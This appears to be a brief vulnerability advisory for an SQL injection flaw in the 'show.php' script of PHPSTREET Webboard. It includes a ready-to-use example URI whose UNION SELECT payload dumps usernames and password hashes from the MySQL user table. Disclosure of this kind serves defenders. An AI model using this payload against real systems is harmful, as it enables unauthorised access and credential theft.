PHPSTREET Webboard 'show.php' SQL Injection Vulnerability

PHPSTREET Webboard 'show.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/show.php?id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),1,1,1,1,1,1/**/FROM/**/mysql.user